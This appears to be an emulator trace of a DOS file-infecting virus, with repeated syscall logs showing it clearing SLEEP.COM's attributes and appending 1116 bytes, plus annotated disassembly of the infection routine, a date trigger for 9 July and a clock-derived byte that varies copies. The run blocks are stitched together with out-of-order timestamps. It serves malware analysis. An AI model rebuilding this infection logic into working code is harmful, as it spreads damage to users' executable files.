2018-12-25T12:30:43.128581322Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.131610844Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.133885873Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.144759111Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.146563718Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.155461081Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.167116638Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.16998286Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.177125777Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.185289633Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.187594725Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.198918813Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.202117239Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.209575664Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.212647845Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.216196366Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.219045595Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.221272436Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.232465285Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.234398804Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.242967095Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.254652864Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:43.257362673Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:43.261854728Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:43.50071438Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:43.504551886Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:43.507522992Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:43.508898576Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:43.523246315Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.530458826Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:43.537450095Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:43.540101119Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.557831491Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.559715675Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.567708828Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.580041285Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.583977895Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.58677317Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.589369703Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.599874121Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.603023934Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.610032631Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.617219626Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.619458209Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.625504772Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.62992377Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.631556249Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.639362906Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.641436633Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.648909433Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.652767694Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.65613046Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.659254027Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.661864822Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.672457496Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.674247579Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.683057122Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.69545691Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.699030484Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.707394027Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.715742938Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.718461082Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.732730942Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.736156535Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.744948504Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.748479375Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.752319822Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.755178806Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.757450417Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.76745379Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.768996918Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.777259404Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.791102267Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:43.793269465Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:43.796857726Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:43.67615633Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:43.680845547Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:43.685939541Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:43.687568619Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:43.694730952Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.702416343Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:43.710363476Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:43.712966371Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.734149805Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.736743859Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.747593399Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.756412127Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.759401176Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.762300012Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.766842389Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.77795124Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.779899167Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.796818075Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.808385051Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.811534322Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.819990884Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.827472783Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.829924098Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.841433724Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.843937408Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.850935727Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.854064206Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.85821611Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.862827922Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.865278117Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.880262054Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.88192902Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.890764664Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.903118645Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.906006268Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.913302663Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.920995476Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.923403224Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.081743349Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.083563385Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.088986355Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.091849113Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.095700874Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.100147568Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.102622301Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.123640028Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.126822677Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.165594312Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:44.181354811Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:44.184726103Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:44.190124248Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.111024272Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.114621264Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.118927869Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.11993639Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.126649664Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.134538196Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:44.141465382Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:44.14354327Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:44.997282471Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:44.999445844Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:45.007025161Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:45.011915169Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.013809851Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.01567551Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:45.017314417Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:45.121396275Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:45.123229008Z 62 PC: 12d05 | Close file
2018-12-25T12:30:45.308297145Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:45.394905028Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:45.398307796Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.407026453Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.41609648Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.418898651Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:45.520714323Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:45.52402322Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:45.53208343Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:45.535411415Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:45.538685188Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:45.542071417Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:45.544386468Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:45.700164484Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:45.702107181Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:45.814258845Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:45.934284295Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:45.941839208Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.949991946Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.957922547Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.961553153Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.033036044Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.035122948Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.043796063Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.046822968Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.049926847Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.054276527Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.056419165Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.173369478Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.180039375Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.31609366Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:46.477744677Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:46.485531409Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.48887567Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.702845803Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.706826818Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.712163062Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.713643561Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.720428575Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.727320648Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:44.733892073Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:44.736743607Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:44.753456646Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:44.75529567Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.761818574Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:44.765253134Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:44.76820051Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:44.771165457Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:44.774075838Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:44.802651896Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:44.804499289Z 62 PC: 12d05 | Close file
2018-12-25T12:30:44.813351169Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:44.823170423Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:44.826022666Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:44.833357736Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:44.839771039Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:44.84195453Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.853009185Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.855232254Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.861898049Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.865857192Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.868543267Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.871322728Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.873601085Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.891458745Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.893151425Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.900745806Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:44.911607154Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:44.91413046Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:44.921024408Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:44.928170021Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:44.930819808Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:44.94104705Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:44.943888192Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:44.95093019Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:44.954040841Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:44.957487485Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:44.960057528Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:44.961897369Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:44.971128162Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:44.973055415Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:44.981432547Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:44.992820306Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
